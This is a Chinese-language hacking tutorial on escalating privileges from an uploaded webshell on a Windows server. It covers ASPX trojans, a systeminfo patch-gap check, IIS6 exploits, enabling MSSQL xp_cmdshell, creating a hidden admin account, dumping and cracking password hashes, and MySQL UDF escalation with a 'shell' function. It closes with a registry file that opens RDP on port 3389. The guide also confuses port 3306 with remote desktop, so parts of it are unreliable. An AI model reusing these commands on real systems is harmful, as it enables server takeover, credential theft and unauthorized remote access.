权限提升

首先上传一个webshell网站上

查看里面的内容，以及shell功能。

由于这个shell本身自带的cmd命令不能运行,而且上传cmd不成功

有新建文件的功能
然后上传一个aspx的马，这个木马的权限。比asp的权限高。
但是前提你必须要知道，那个目录有可读可写可执行的权限。

进入aspx的木马中。
发现这个马中的cmd也没有权限。
那就上传一个cmd。
然后在asp马上执行，一下

systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280
KB3143141 KB3134228 KB3079904 KB3077657 KB3124280
KB3045171 KB2829361 KB3000061 KB2850851 KB2707511
KB970483 KB2124261 KB2271195) do @type C:\Windows
\Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /
q /a C:\Windows\Temp\temp.txt
查看补丁的补丁编号。

这个时候可以上传一个利用补丁漏洞的shell，IIS6

创建一个用户。

把他放到admin用户组中

启动用户。

查看用户信息。

已经是admin用户了。
然后可以远程连接了。

MSSQL权限提升

在上传的aspx木马上，使用database连接

使用mssql，以及下面的回显信息表示成功。

使用XP_cmdshelll exec

一般数据库都是禁用这些功能的。

利用Add xp_cmdshell(SQL2005)开启xp_cmdshell服务。

接下来我么可以创建一个用户。

把用户添加到，admin组中。

完成远程连接

而且我们也可以，上传一个gethash的exe获取，账户密码hash。

可以利用解hash网站来获得密码
http://www.objectif-securite.ch/ophcrack.php

利用UDF提权

什么是UDf

UDF顾名思义，就是User defined Function，用户定义函数。我们知道，MySQL本身支持很多内建的函数，此外还可以通过创建存储方法来定义函数。UDF为用户提供了一种更高效的方式来创建函数。
UDF与普通函数类似，有参数，也有输出。分为两种类型：单次调用型和聚集函数。前者能够针对每一行数据进行处理，后者则用于处理Group By这样的情况

使用UDF的优点

1)UDF的兼容性很好，这得益于MySQL的UDF基本上没有变动
2)比存储方法具有更高的执行效率，并支持聚集函数
3)相比修改代码增加函数，更加方便简单

UDF提权利用过程

• 在上传的shell中，没有操作系统的漏洞，可以采用mysql的UDF提权。
• 导入udf.dll文件到服务器指定目录
  1.档mysql版本大于5.1 需要把udf.php文件导入到mysql安装目录下/lib/plugin_dir目录（默认目录不存在，创建目录，查看select @@basedir）
  2.mysql版本小于5.1 udf.php导入到c:\windows\目录
• 使用sql语句创建功能函数

CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'

• 执行mysql语句调用新创建的函数

select shell(‘cmd','whoami')

• 删除创建的函数

drop function shell;

1.利用大马自带的mysql执行功能查看版本信息。

而且这个测试环境也可以使用操作系统提权

2.上传一个udf.php用来协助我们更方便的实现上传udf.dll上传到服务器上

生成一个shell，然后调用系统命令，创建一个用户并把用户添加到管路员组。

完成添加用户到admin的功能。

远程连接（远程连接的前提功能是服务器开启3306端口）

如果没有开启我们可通过创建一个.reg文件来开启。

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000D3D
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000D3D
regedit /s C:\3389.reg